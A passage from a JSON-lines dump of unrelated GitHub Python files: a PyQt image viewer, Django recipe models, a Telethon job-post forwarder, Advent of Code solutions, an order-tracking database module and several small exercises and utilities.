QHBoxLayout()\n\n # Left side with file list and \"Open Image Folder\" button\n left_widget = QWidget()\n left_layout = QVBoxLayout()\n left_widget.setLayout(left_layout)\n left_widget.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\n\n self.file_list_widget = QListWidget(self)\n self.file_list_widget.itemClicked.connect(self.display_image)\n # Set text color and background color for the file list widget items\n self.file_list_widget.setStyleSheet(\n \"QListWidget { background-color: purple; }\"\n \"QListWidget:item { color: white; }\"\n )\n left_layout.addWidget(self.file_list_widget)\n\n open_button = QPushButton('Open Image Folder', self)\n open_button.setCursor(QCursor(QtCore.Qt.PointingHandCursor))\n open_button.clicked.connect(self.open_image_folder)\n open_button.setStyleSheet(\n \"*{border: 2px solid '#BC006C';\" +\n \" border-radius: 10px;\" +\n \" font-size: 20px;\" +\n \" color: white;\" +\n \" padding: 10px 0;\" +\n \" margin:10px 10px ;}\" +\n \"*:hover{background: '#BC006C';}\"\n )\n open_button.setFixedSize(290, 80)\n left_layout.addWidget(open_button)\n\n # Right side with displayed image\n right_widget = QWidget()\n right_layout = QVBoxLayout()\n right_widget.setLayout(right_layout)\n\n # Add the \"logo6.png\" initially visible\n self.logo_label = QLabel()\n logo_pixmap = QPixmap(\"logo6.png\")\n self.logo_label.setPixmap(logo_pixmap)\n self.logo_label.setAlignment(Qt.AlignCenter)\n right_layout.addWidget(self.logo_label)\n\n self.image_label = QLabel(self)\n right_layout.addWidget(self.image_label)\n\n main_layout.addWidget(left_widget, 3) # Adjust proportions as needed\n main_layout.addWidget(right_widget, 7) # Adjust proportions as needed\n\n self.setLayout(main_layout)\n\n self.current_folder = \"\"\n\n def open_image_folder(self):\n self.logo_label.hide() # Hide the logo when the folder is opened\n options = QFileDialog.Options()\n folder_path = QFileDialog.getExistingDirectory(\n self, 'Open Image Folder', options=options)\n if folder_path:\n self.current_folder = folder_path\n self.update_file_list(folder_path)\n\n def update_file_list(self, folder_path):\n self.file_list_widget.clear()\n for filename in os.listdir(folder_path):\n if filename.lower().endswith((\".png\", \".gif\", \".jpg\", \".jpeg\", \".bmp\")):\n item = QListWidgetItem(filename)\n self.file_list_widget.addItem(item)\n\n def display_image(self, item):\n if self.current_folder:\n image_path = os.path.join(self.current_folder, item.text())\n pixmap = QPixmap(image_path)\n self.image_label.setPixmap(pixmap)\n self.image_label.adjustSize()\n\n\ndef main():\n app = QApplication(sys.argv)\n viewer = ImageViewer()\n viewer.exec_() # Use exec_() to show the QDialog as a modal dialog\n sys.exit(app.exec_())\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Lightmaker777/IMAGE-Multi-Tool","sub_path":"img_viewer.py","file_name":"img_viewer.py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"13828462492","text":"import glob\nimport io\nimport sys\n\nfrom setuptools import setup\n\n# add mosaic_topog to our path in order to use the branch_scheme function\nsys.path.append(\"mosaic_topog\")\n#from branch_scheme import branch_scheme # noqa\n\nwith io.open(\"README.md\", \"r\", encoding=\"utf-8\") as readme_file:\n readme = readme_file.read()\n\nsetup_args = {\n \"name\": \"mosaic_topog\",\n \"author\": \"Sierra Schleufer, Sabesan Lab\",\n \"url\": \"https://github.com/schleuf/Incubator-2022-Geometry-of-Color/mosaic_topog/\",\n \"license\": \"MIT\",\n \"description\": \"tools for analyzing the geometry of cones in the photoreceptor mosaic\",\n \"long_description\": readme,\n \"long_description_content_type\": \"text/markdown\",\n \"package_dir\": {\"mosaic_topog\": \"mosaic_topog\"},\n \"packages\": [\"mosaic_topog\", \"mosaic_topog.tests\"],\n \"scripts\": glob.glob(\"scripts/*\"),\n #\"use_scm_version\": {\"local_scheme\": branch_scheme},\n \"include_package_data\": True,\n \"install_requires\": [\n \"numpy\",\n \"matplotlib\",\n \"scipy\",\n ],\n\n \"keywords\": \"cone photoreceptors\",\n}\n\nif __name__ == \"__main__\":\n setup(**setup_args)","repo_name":"schleuf/Incubator-2022-Geometry-of-Color","sub_path":"mosaic_topog/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9439668161","text":"from datetime import datetime\nimport logging\nimport os\n\ntstart = datetime.now()\ndir = 'logs/'\nif not os.path.exists(dir):\n os.mkdir(dir)\nlog_file = 'logs/builder_' + tstart.__str__() + '.log'\nlogging.basicConfig(filename=log_file, filemode='w', format='%(levelname)s:%(message)s', level=logging.INFO)\nlog = logging.getLogger(__name__)\n\n# build train module\n\n# launch train module\n\n# build and save predict module\n\n\n\nlog.info(\"All things built\")\ntend = datetime.now()\nlog.info('Total execute time ' + (tend - tstart).__str__())\n\n\n","repo_name":"truemanD/jn-production","sub_path":"builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7129622741","text":"import socket\nimport subprocess\nimport threading\nimport time\nimport sys\nimport os\n\nclass Vio:\n max_response_size = 1024\n vio_server_script = os.path.dirname(__file__) + \"/vio_server.tcl\"\n\n def __init__(self,\n tclsh=[\"tclsh\"],\n port=33000):\n self.tclsh = tclsh\n self.port = port\n\n def start(self):\n # Start server\n def vio_server_start():\n subprocess.run([*self.tclsh, Vio.vio_server_script, str(self.port)],\n stdout=sys.stdout, stderr=sys.stderr)\n \n self.vio_server_thread = threading.Thread(target=vio_server_start)\n self.vio_server_thread.start()\n print(\"Started VIO server.\")\n time.sleep(0.5)\n \n # Connect to server\n while True:\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n self.socket.connect((\"127.0.0.1\", self.port))\n break\n except ConnectionRefusedError:\n print(\"Connection refused. Trying again.\")\n self.socket.close()\n time.sleep(1)\n print(\"Socket connected.\")\n\n\n def _execute_vio_command(self, command):\n self.socket.send(bytes(command + \"\\n\", 'utf-8'))\n response = self.socket.recv(Vio.max_response_size).decode(\"utf-8\")\n \n status = response[0]\n response = response[1:]\n \n length = len(response) # response ends with \\r\\n\n response = response[0:length-2]\n \n if status == \"1\":\n return response\n elif status == \"0\":\n print(\"Command failed.\")\n return None\n else:\n print(\"Response has invalid status byte\")\n return None\n\n def read(self, name):\n return self._execute_vio_command(\"read \" + name)\n\n def write(self, name, value):\n res = self._execute_vio_command(\"write \" + name + \" \" + str(value))\n if res != None:\n return True\n else:\n return False\n \n def _print_response(response):\n print(\"Response: \\\"\" + response + \"\\\"\")\n\n def test(self):\n res = self._execute_vio_command(\"test\")\n if res == None or res != \"Test successfull.\":\n print(\"Test command unsuccessfull.\")\n return False\n \n res = self._execute_vio_command(\"asdf\")\n if res != None:\n print(\"Unsupported command did not reported.\")\n return False\n \n return True\n\n def stop(self):\n # Stop server\n res = self._execute_vio_command(\"exit\")\n \n # Disconnect client\n self.socket.close()\n print(\"Socket closed.\")\n\n \ndef main():\n vio = Vio()\n vio.start()\n if vio.test():\n print(\"Server test successfull.\")\n else:\n print(\"Server test FAILED.\")\n print(vio.read(\"led0\"))\n vio.write(\"sw0\", 1)\n vio.stop()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"canaknesil/vio-interface","sub_path":"vio.py","file_name":"vio.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"25590127032","text":"# Import the required libraries\nfrom tkinter import *\nfrom pystray import MenuItem as item\nimport pystray\nfrom PIL import Image, ImageTk\n\n# Create an instance of tkinter frame or window\nwin=Tk()\nwin.title(\"Reflow importer\")\nwin.iconbitmap(\"etc/favicon.ico\")\n\n# Set the size of the window\nwin.geometry(\"400x350\")\n\n\n# Add a Scrollbar(horizontal)\nv=Scrollbar(win, orient='vertical')\nv.pack(side=RIGHT, fill='y')\n\n# Add a text widget\ntext=Text(win, font=(\"Arial, 8\"), yscrollcommand=v.set)\n\n# Add some text in the text widget\n##for i in range(10):\n## text.insert(END, \"Welcome to Tutorialspoint...\\n\")\n## text.pack()\n\n# Attach the scrollbar with the text widget\nv.config(command=text.yview)\n#text.pack()\n\n# Define a function for quit the window\ndef quit_window(icon, item):\n icon.stop()\n win.destroy()\n\n# Define a function to show the window again\ndef show_window(icon, item):\n icon.stop()\n win.after(0,win.deiconify())\n\ndef info_window(icon, item):\n import webbrowser\n webbrowser.open_new(\"github.com/mcarlo95/reflow/\")\n\n# Hide the window and show on the system taskbar\ndef hide_window():\n win.withdraw()\n image=Image.open(\"etc/favicon.ico\")\n menu=(item('Quit', quit_window), item('Info', info_window), item('Show', show_window))\n icon=pystray.Icon(\"name\", image, \"Reflow importer running\", menu)\n icon.run_detached()\n\nwin.protocol('WM_DELETE_WINDOW', hide_window)\n\nwin.update_idletasks()\nwin.update()\n##\n#win.mainloop()\n","repo_name":"mcarlo95/reflow","sub_path":"dist/r011_reflow_interface.py","file_name":"r011_reflow_interface.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"322144496","text":"import sys\n\ndef getDataFile(path):\n fd = open(path, 'r')\n return fd.read()\n\ndef getOutcomRound(choice):\n if choice[0] == 'A':\n if choice[1] == 'X':\n return 3\n elif choice[1] == 'Y':\n return 6\n else:\n return 0\n elif choice[0] == 'B':\n if choice[1] == 'Y':\n return 3\n elif choice[1] == 'Z':\n return 6\n else:\n return 0\n else:\n if choice[1] == 'Z':\n return 3\n elif choice[1] == 'X':\n return 6\n else:\n return 0\n\ndef getMatchStrategies(choice):\n if choice[0] == 'A':\n if choice[1] == 'X':\n return 'Z'\n elif choice[1] == 'Y':\n return 'X'\n else:\n return 'Y'\n\n elif choice[0] == 'B':\n if choice[1] == 'X':\n return 'X'\n elif choice[1] == 'Y':\n return 'Y'\n else:\n return 'Z'\n else:\n if choice[1] == 'X':\n return 'Y'\n elif choice[1] == 'Y':\n return 'Z'\n else:\n return 'X'\n\ndef getShapeScore(shape):\n return 1 if shape == 'X' else 2 if shape == 'Y' else 3\n\ndef getMatchScore(match, elfStrategy):\n choice = match.split(' ')\n if elfStrategy:\n choice[1] = getMatchStrategies(choice)\n return getOutcomRound(choice) + getShapeScore(choice[1])\n\ndef getAllScore(buffer, elfStrategy):\n bufferArray = buffer.split('\\n')\n scores = []\n for x in bufferArray:\n scores.append(getMatchScore(x, elfStrategy))\n return scores\n\ndef getMyScore(scores):\n myScore = 0\n for x in scores:\n myScore += x\n return myScore\n\n# AX Rock 1 | BY Paper 2 | CZ Scissors 3\n# Lose 0 | Draw 3 | Win 6 \n\ndef main():\n if len(sys.argv) != 2:\n sys.exit(1)\n try:\n buffer = getDataFile(sys.argv[1])\n scores = getAllScore(buffer, False)\n print(\"Your total score will be\", getMyScore(scores))\n \n scores = getAllScore(buffer, True)\n print(\"Your total score with strategy guide will be\", getMyScore(scores))\n except OSError:\n print(\"Impossible to read\", sys.argv[1])\n sys.exit(1)\n except Exception as e:\n print(\"Unknown error !\", e)\n sys.exit(1)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"BliTz037/AdventOfCode2022","sub_path":"day02/day02.py","file_name":"day02.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37619137130","text":"from database.database import conn\nfrom sqlalchemy import text\nimport json\nimport datetime\nfrom models.expectedDelivery.expectedDelivery import getNumberOfDays\n\ndef addToOrders(userId,productId,timestamp,address,state,city,pincode):\n result=conn.execute(text(\"insert into orders(user_id,product_id,order_time,address,state,city,pincode) values (:userId,:productId,:timestamp,:address,:state,:city,:pincode)\").bindparams(userId=userId,productId=productId,timestamp=timestamp,address=address,state=state,city=city,pincode=pincode))\n number_of_days=getNumberOfDays(str(pincode))\n new_date_obj = timestamp + datetime.timedelta(days=number_of_days)\n expected_delivery = new_date_obj.strftime('%Y-%m-%d')\n order_status_result=conn.execute(text(\"insert into order_status(order_id,status,expected_delivery) values (:order_id,:status,:date)\").bindparams(order_id=result.lastrowid,status=\"In-Process\",date=expected_delivery))\n product_ids=json.loads(productId)\n for id in product_ids:\n conn.execute(text('update products set quantity=quantity-1 where id=:id').bindparams(id=id))\n\ndef getOrders(userId):\n result=conn.execute(text(\"select * from orders where user_id=:id order by order_time desc\").bindparams(id=userId)).all() \n orders=[]\n for row in result:\n orders.append(dict(row._mapping))\n return orders \n \ndef getOrdersForAdmin():\n result=conn.execute(text(\"select * from orders where id in (select order_id from order_status where status!=:status) order by order_time desc\").bindparams(status=\"Delivered\")).all() \n orders=[]\n for row in result:\n orders.append(dict(row._mapping))\n return orders \n\ndef getOrderDetails(orders):\n final_list={}\n for order in orders:\n products=json.loads(order['product_id'])\n temp_list=[]\n for id in products:\n result=conn.execute(text(\"select * from products where id=:id\").bindparams(id=id)).fetchone()\n temp_dict=dict(result._mapping)\n temp_dict['order_id']=order['id']\n temp_list.append(temp_dict) \n final_list[order['order_time']]=temp_list\n return final_list \n\ndef getOrderId(orderTime,userId):\n result=conn.execute(text(\"select id from orders where user_id=:id and order_time=:orderTime\").bindparams(id=userId,orderTime=orderTime)).fetchone()\n return int(result[0])\n\ndef getOrderStatus(orders):\n status=[]\n for order in orders:\n result=conn.execute(text(\"select * from order_status where order_id=:id\").bindparams(id=order['id'])).all() \n for row in result:\n status.append(dict(row._mapping))\n return status\n\ndef getParticularOrder(order_id):\n result=conn.execute(text(\"select * from orders where id=:id\").bindparams(id=order_id)).fetchone()\n return dict(result._mapping)\n\ndef getParticularOrderStatus(order_id):\n result=conn.execute(text(\"select * from order_status where order_id=:id\").bindparams(id=order_id)).fetchone()\n return dict(result._mapping)\n\ndef getOrderDetailsForParticularOrder(order):\n ids=json.loads(order['product_id'])\n products=[]\n for id in ids:\n result=conn.execute(text(\"select * from products where id=:id\").bindparams(id=id)).fetchone()\n products.append(dict(result._mapping)) \n return products\n\ndef updateOrderStatus(order_id,status):\n if(status==\"Delivered\"):\n current_date = datetime.date.today().strftime('%Y-%m-%d')\n conn.execute(text('update order_status set status=:status, delivered_on=:date where order_id=:id').bindparams(status=status,id=order_id,date=current_date))\n else:\n conn.execute(text('update order_status set status=:status where order_id=:id').bindparams(status=status,id=order_id))","repo_name":"mohit-cse/ProcurementTrackingSystem","sub_path":"database/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":3823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24642821860","text":"from aoc import *\nimport re\nfrom collections import defaultdict\n\n\ndef part_1(data):\n letters = {letter for line in data for letter in line}\n requirements = defaultdict(set)\n for (a, b) in data:\n requirements[b].add(a)\n is_available = lambda letter: not (letters & requirements[letter])\n result = []\n while letters:\n next_letter = min(filter(is_available, letters))\n result.append(next_letter)\n letters.remove(next_letter)\n return cat(result)\n\n\ndef part_2(data, workers = 1):\n letters = {letter for line in data for letter in line}\n end_times = {l: 999999 for l in letters}\n requirements = defaultdict(set)\n for (a, b) in data:\n requirements[b].add(a)\n time = 0\n while letters:\n workers += count(end_times[l] == time for l in end_times)\n is_available = lambda letter: all(end_times[l] <= time for l in requirements[letter])\n available_letters = sorted(filter(is_available, letters))\n for l in available_letters[:workers]:\n letters.remove(l)\n end_times[l] = time + ord(l) - 4\n workers -= 1\n time += 1\n return max(end_times.values())\n\n\ndata = mapl(lambda line: re.findall(\" ([A-Z]) \", line), read_input(7))\nprint(part_1(data))\nprint(part_2(data, 5))\n","repo_name":"narimiran/AdventOfCode2018","sub_path":"python/day07.py","file_name":"day07.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"40"} +{"seq_id":"35844611383","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport asyncio\nimport os\nimport logging\nfrom configparser import ConfigParser, MissingSectionHeaderError\n\n\n\ntry:\n import socks\nexcept (ImportError, ModuleNotFoundError):\n import sys\n import subprocess\n\n BASE_DIR = os.path.dirname(os.path.abspath(__file__))\n input_file = os.path.join(BASE_DIR, 'requirements.txt')\n PIPE = subprocess.PIPE\n p = subprocess.Popen(sys.executable + f' -m pip3 install -r {input_file}', shell=True)\n p.wait()\n import socks\nfrom telethon import TelegramClient, events\nfrom telethon.tl.types import PeerChannel\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n filename='start_log.txt', level=logging.ERROR)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ncfg = os.path.join(BASE_DIR, 'config.ini')\n\nparser = ConfigParser()\ntry:\n parser.read(cfg, encoding='UTF-8')\nexcept MissingSectionHeaderError:\n print('Someone edit config file with fucking windows notepad!')\n temp = None\n with open(cfg, 'rb') as config:\n temp = config.read().decode(\"utf-8-sig\").encode(\"utf-8\")\n with open(cfg, 'wb') as config:\n config.write(temp)\n parser.read(cfg, encoding='UTF-8')\n\n# bot values\napi_id = parser.get('App_values', 'api_id')\napi_hash = parser.get('App_values', 'api_hash')\n\n# target words\ntarget_words = []\nfor word in parser['Target_Words'].values():\n target_words.append(word)\n\n# init my channels\nmain_channel = parser.get('Project_Channels', 'MainChannel')\nreserved_channel = parser.get('Project_Channels', 'ReservedChannel')\n\nclient = TelegramClient('work_session', api_id, api_hash, device_model='Tesla Model S',\n # connection=connection.ConnectionTcpMTProxyIntermediate,\n # если есть MTProto proxy - убрать решетки над и под этой надписью, отредактировать запись снизу\n # главное скобки не упустить.\n # proxy=('host', 443, 'secret'))\n proxy=(socks.SOCKS5, '127.0.0.1', 1088))\n\n\nasync def listen_channels(event: events.NewMessage):\n \"\"\"\n Если какие-то из целевых слов есть в тексте и какое-то из 3х слов еще есть в сообщении - пересылаем в основной канал\n если из 3х слов нет ни одного - отправляем в резервный канал.\n помечаем сообщение, как прочитанное.\n :param event:\n :return:\n \"\"\"\n if any(word in event.message.message.lower() for word in target_words):\n if any(trigger in event.message.message.lower() for trigger in ['ищу', 'вакансия', 'требуется']):\n await client.forward_messages(main_channel, event.message.id, event.message.to_id)\n else:\n await client.forward_messages(reserved_channel, event.message.id, event.message.to_id)\n await event.message.mark_read()\n\n\nasync def prepare_donors(client_: TelegramClient):\n \"\"\"\n Все группы доноры преобразуем в ID-ы, чтобы, если поменялась ссылка, не перестало работать.\n :return:\n \"\"\"\n donors = []\n for number, query in parser['Donor_Channels'].items():\n if query.isdigit():\n donor: PeerChannel = PeerChannel(int(query))\n else:\n try:\n donor: PeerChannel = await client_.get_entity(query)\n except Exception as err:\n print(err)\n continue\n else:\n parser.set('Donor_Channels', number, str(donor.id))\n donors.append(donor)\n with open(cfg, 'w', encoding='UTF-8') as conf:\n parser.write(conf)\n print('Все ссылки успешно преобразованы.')\n client_.add_event_handler(listen_channels, events.NewMessage(chats=(*donors,)))\n\n\nif __name__ == '__main__':\n client.start()\n client.loop.create_task(prepare_donors(client))\n client.run_until_disconnected()\n","repo_name":"Neggod/TelethonParser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4205,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"33407221301","text":"from django.db import models\nfrom django.core.validators import (\n RegexValidator,\n MinValueValidator,\n MaxValueValidator,\n)\n\nfrom django.conf import settings\n\nfrom users.models import User\n\n\nclass Tag(models.Model):\n name = models.CharField(\n 'Recipe tag',\n max_length=32,\n null=False,\n unique=True,\n )\n slug = models.SlugField(\n 'Recipe tag slug',\n max_length=16,\n null=False,\n unique=True,\n )\n color = models.CharField(\n 'Tag color',\n max_length=16,\n null=False,\n unique=True,\n validators=[\n RegexValidator(\n regex=r'^#[0-9a-fA-F]{3,6}$',\n message='Color format error (#AABBCC or #ABC)',\n )\n ],\n )\n\n class Meta:\n ordering = ('name',)\n\n def __str__(self):\n return self.name\n\n\nclass Recipe(models.Model):\n name = models.CharField(\n 'Recipe name',\n max_length=200,\n db_index=True,\n )\n text = models.TextField(\n 'Recipe description',\n )\n author = models.ForeignKey(\n User,\n verbose_name='Recipe author',\n on_delete=models.CASCADE,\n related_name='recipes',\n )\n image = models.ImageField(\n 'Recipe photo',\n upload_to='recipes_photos/',\n )\n tags = models.ManyToManyField(\n Tag,\n related_name='recipes',\n )\n cooking_time = models.PositiveSmallIntegerField(\n 'cooking time',\n validators=[\n MinValueValidator(limit_value=1),\n MaxValueValidator(limit_value=60*24),\n ]\n )\n # Здесь логика такая:\n # Users - отдельное самостоятельное приложение,\n # которое умеет в пользователей и подписки.\n # Если его на уровне модели связать с этим\n # узкоспециализированным приложением, то оно\n # перестанет быть самодостаточным.\n # Если логика такая себе, уже исправлю без вопросов )\n favorite = models.ManyToManyField(\n User,\n related_name='favorite_recipes',\n blank=True,\n )\n pub_date = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Publish date',\n )\n\n class Meta:\n ordering = ('-pub_date',)\n\n def __str__(self):\n return self.name\n\n def favorite_count(self):\n return self.favorite.count()\n\n\nclass Ingredient(models.Model):\n name = models.CharField(\n 'Ingredient name',\n max_length=settings.STANDARD_MAX_CHAR_FIELD_LENGTH,\n db_index=True,\n )\n measurement_unit = models.CharField(\n 'Measurement unit',\n max_length=16,\n null=False,\n )\n\n class Meta:\n ordering = ('name',)\n\n def __str__(self):\n return f'{self.name} ({self.measurement_unit})'\n\n\nclass RecipeIngredients(models.Model):\n ingredient = models.ForeignKey(\n Ingredient,\n verbose_name='Ingredient with measurement unit',\n on_delete=models.CASCADE,\n null=False,\n related_name='+',\n )\n recipe = models.ForeignKey(\n Recipe,\n verbose_name='Recipe',\n on_delete=models.CASCADE,\n null=False,\n related_name='ingredients',\n )\n amount = models.PositiveSmallIntegerField(\n 'amount of ingredient',\n validators=[\n MinValueValidator(limit_value=1),\n MaxValueValidator(limit_value=10000),\n ]\n )\n\n class Meta:\n ordering = ('ingredient__name',)\n\n\nclass Cart(models.Model):\n user = models.OneToOneField(\n User,\n verbose_name='Cart owner',\n on_delete=models.CASCADE,\n related_name='cart',\n )\n recipes = models.ManyToManyField(\n Recipe,\n verbose_name='Recipes in cart',\n related_name='+',\n )\n\n class Meta:\n ordering = ('recipes__name',)\n\n def recipes_in_cart_count(self):\n return self.recipes.count()\n","repo_name":"sldmxm/foodgram-project-react","sub_path":"backend/recipes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42306050566","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('article', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='article',\n name='article_scheme_area',\n ),\n migrations.RemoveField(\n model_name='article',\n name='article_scheme_house',\n ),\n migrations.AlterField(\n model_name='article',\n name='article_foto',\n field=models.CharField(default='', verbose_name='Фотографія обєкту', max_length=400),\n ),\n ]\n","repo_name":"bezpoleznuj/zagran3","sub_path":"article/migrations/0002_auto_20150415_1919.py","file_name":"0002_auto_20150415_1919.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"39504003989","text":"import pickle\nimport random\nquiz1 = [\"우리나라 최초의 한글 소설로 전해지는 이 고전소설의 이름은?\"]\nquiz2 = [\"오스트레일리아(호주)의 수도는?\"]\nquiz3 = [\"우리나라 국보 1호였던 문하재의 이름은?\"]\nquiz4 = [\"우리나라 수도는?\"]\nanswer1 = [\"피리부는사나이\",\"홍길동전\",\"어린왕자\",\"피터팬\"]\nanswer2 = [\"오세니아\",\"캔버라\",\"파리\",\"뉴욕\"]\nanswer3 = [\"경복궁\",\"승례문\",\"동대문\",\"불국사\"]\nanswer4 = [\"부산\",\"서울\",\"대구\",\"인천\"]\nwith open(\"pickles3.dat\", \"wb\") as pickle_file:\n pickle.dump(quiz1, pickle_file)\n pickle.dump(quiz2, pickle_file)\n pickle.dump(quiz3, pickle_file)\n pickle.dump(quiz4, pickle_file)\nwith open(\"pickles4.dat\", \"wb\") as pickle_file:\n pickle.dump(answer1, pickle_file)\n pickle.dump(answer2, pickle_file)\n pickle.dump(answer3, pickle_file)\n pickle.dump(answer4, pickle_file)\nwith open(\"pickles3.dat\", \"rb\") as pickle_file:\n loadquiz1 = pickle.load(pickle_file)\n loadquiz2 = pickle.load(pickle_file)\n loadquiz3 = pickle.load(pickle_file)\n loadquiz4 = pickle.load(pickle_file)\nwith open(\"pickles4.dat\", \"rb\") as pickle_file:\n loadanswer1 = pickle.load(pickle_file)\n loadanswer2 = pickle.load(pickle_file)\n loadanswer3 = pickle.load(pickle_file)\n loadanswer4 = pickle.load(pickle_file)\n\n\n\nprint(\" Welcome to Trivia Challenge!\\n\")\nprint(\" An Episode You Can't Refuse\\n\")\n\nquestions = [loadquiz1, loadquiz2, loadquiz3, loadquiz4]\nanswers = [loadanswer1, loadanswer2, loadanswer3, loadanswer4]\n\nwhile True:\n randomquestion = random.randint(0, len(questions) - 1)\n c_question = questions[randomquestion]\n c_answer = answers[randomquestion]\n \n print(f\"\\n{c_question[0]}\\n\") \n for i, option in enumerate(c_answer, start = 1):\n print(f\" {i} - {option}\")\n\n\n user = input(\"What's your answer?:\")\n try:\n user = int(user)\n if 1 <= user <= len(c_answer):\n if c_answer[user -1] == c_answer[1]:\n print(\"Correct\\n\")\n \n else:\n print(\"Wrong\\n\")\n else:\n print(\"try to input\\n\")\n except ValueError:\n print(\"Invalid input\\n\")\n\n","repo_name":"jungsungyun/pythonpro","sub_path":"chap8/prob6.py","file_name":"prob6.py","file_ext":"py","file_size_in_byte":2230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33406330753","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nimport aerospike\nimport pprint\nimport sys\nfrom random import randint\nimport datetime\n\ntry:\n\tconfig = {\n\t 'hosts': [\n\t\t( '127.0.0.1', 3000 )\n\t ],\n\t 'policies': {\n\t\t'timeout': 1000 # milliseconds\n\t }\n\t}\n\n\tclient = aerospike.client(config).connect()\n\nexcept Exception as e:\n print(\"error: {0}\".format(e), file=sys.stderr)\n sys.exit(1)\n\n\ntry:\n\n\tpp = pprint.PrettyPrinter(indent=2)\n\tclient = aerospike.client(config).connect()\n\t\t\t\n\tfor i in range(0,1000):\n\t\tkeyid = randint(0,10000) \t\n\t\t#tms = unicode(datetime.datetime.now())\n\t\tkey = ('test', 'table', keyid)\n\t\t#bins = {'timestamp': tms} \n\t\t(keyidr, meta, bins) = client.get(key)\n\n\tpp.pprint(i)\n\tpp.pprint(keyid)\n\tpp.pprint(meta)\n\tpp.pprint(bins)\n\nexcept Exception as e:\n\tprint(\"error: {0}\".format(e), file=sys.stderr)\n\tclient.close()\n\tsys.exit(2)\n\n\n\n","repo_name":"juv1nsk1/howto","sub_path":"playground/aero-bench-get.py","file_name":"aero-bench-get.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"40"} +{"seq_id":"5972400795","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\n\n\ndef get_page_reading_time(url: int) -> int:\n page = requests.get(\"https://klopets.com/readtime/?url={}\".format(url))\n soup = BeautifulSoup(page.content, \"html.parser\")\n result_by_id = soup.find(\"p\")\n if result_by_id != None:\n time_read = re.findall('[0-9]+' ,result_by_id.text)\n time_read_minutes = int(time_read[0])\n return time_read_minutes\n else:\n return 0\n\nif __name__==\"__main__\":\n print(get_page_reading_time(\"https://medium.com/@Relay_Chain/the-relay-bridge-how-does-it-works-d46ee1c795b3\"))\n","repo_name":"Miyamura80/Useful-Commands","sub_path":"Useful-API/youtube_search.py","file_name":"youtube_search.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71250044922","text":"#wap to input length in feet and inches and print its equivalent length in metres\n# 1ft = 12 inch , 1 inch = 2.54 cm, 100cm = 1m\n\n\nvar_in_ft = int(input(\"enter the length in ft.: \"))\nvar_in_inch = int(input(\"enter the lenght in inches: \"))\n\nto_inch = var_in_ft * 12 \nto_cm = to_inch * 2.54 \nto_cm += (var_in_inch * 2.54) \nto_m = (to_cm / 100)\n\n\nprint(\"length in \" + str(var_in_ft) + \" ft will be in \" + str(to_m) + \" metres.\" )\n\n\n\n","repo_name":"asishraz/banka_sir_notes","sub_path":"ch_1/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"1247598802","text":"def solution(scores):\n min_val = scores[0]\n max_val = scores[0]\n min_count = 0\n max_count = 0\n\n for i in range(len(scores)):\n if(scores[i] > max_val):\n max_val = scores[i]\n max_count += 1\n\n if(scores[i] < min_val):\n min_val = scores[i]\n min_count += 1\n\n return [max_count, min_count]\n\nif __name__ == '__main__':\n scores = [10, 5, 20, 20, 4, 5, 2, 25, 1]\n x = solution(scores)\n print(x)","repo_name":"Somenath95/hackerrank_practice","sub_path":"ex_2_breaking_best_and_worst.py","file_name":"ex_2_breaking_best_and_worst.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73628775799","text":"class FlowLog(object):\n\n def __init__(self, flowLogId=None, flowLogName=None, description=None, flowLogType=None, flowLogStatus=None, collectResources=None, collectTrafficType=None, 